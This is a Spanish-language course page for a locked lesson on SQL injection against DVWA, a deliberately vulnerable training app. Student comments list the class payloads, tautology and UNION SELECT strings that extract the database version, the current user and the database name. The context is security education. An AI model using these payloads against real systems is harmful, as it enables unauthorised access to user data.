No tienes acceso a esta clase

¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera

Ataques de inyección de código para obtener información de usuarios y nombre de la base de datos

28/33
Recursos

DVWA(Damn Vulnerable Web Application) es una herramienta para aprender y probar diferentes tipos de ataque.

Aportes 14

Preguntas 4

Ordenar por:

Los aportes, preguntas y respuestas son vitales para aprender en comunidad. Regístrate o inicia sesión para participar.

Comando utilizados en la clase:
Sintaxis (estructura mysql):
SELECT first_name, last_name
FROM users
WHERE user_id = '$id’
Ej: 1 (devuelve user id1)
;

Sintaxis de Inyecciones:
WHERE user_id = ‘%’ or ‘0’=‘0’
UNION SELECT null,version()’
;

Escribir en campo:
%’ or ‘0’=‘0’ UNION SELECT null,version()’ = devuelve usuarios id y la versión del SO
%’ or ‘0’=‘0’ UNION SELECT null,user()’ = devuelve usuarios id y el tipo de usuario (ej. root)
%’ or ‘0’=‘0’ UNION SELECT null,database()’ = devuelve usuarios id y la base de datos

 %’ or '0'='0
------------------
%’ or '0'='0'
UNION SELECT null,version()'
-----------------------------

Deberían entonces añadir a la ruta de seguridad informática algún curso de bases de datos

les recomiendo volver a dejar el proxy en automatico del navegador

Consultas:

’ or ‘0’=‘0
’ or ‘0’=‘0’ UNION SELECT null,version()’
’ or ‘0’=‘0’ UNION SELECT null,user()’
’ or ‘0’=‘0’ UNION SELECT null,database()’

No olviden configurar la seguridad a low.

Buena clase y entendida claramente!

He trabajado con sql pero cielos ese % me confundio… no entendi ese %

Excelente clase, para introducirnos en el SQL Inject.

Muy buena clase, se me complico un poco con las comillas pero lo logre

no me funciona los querys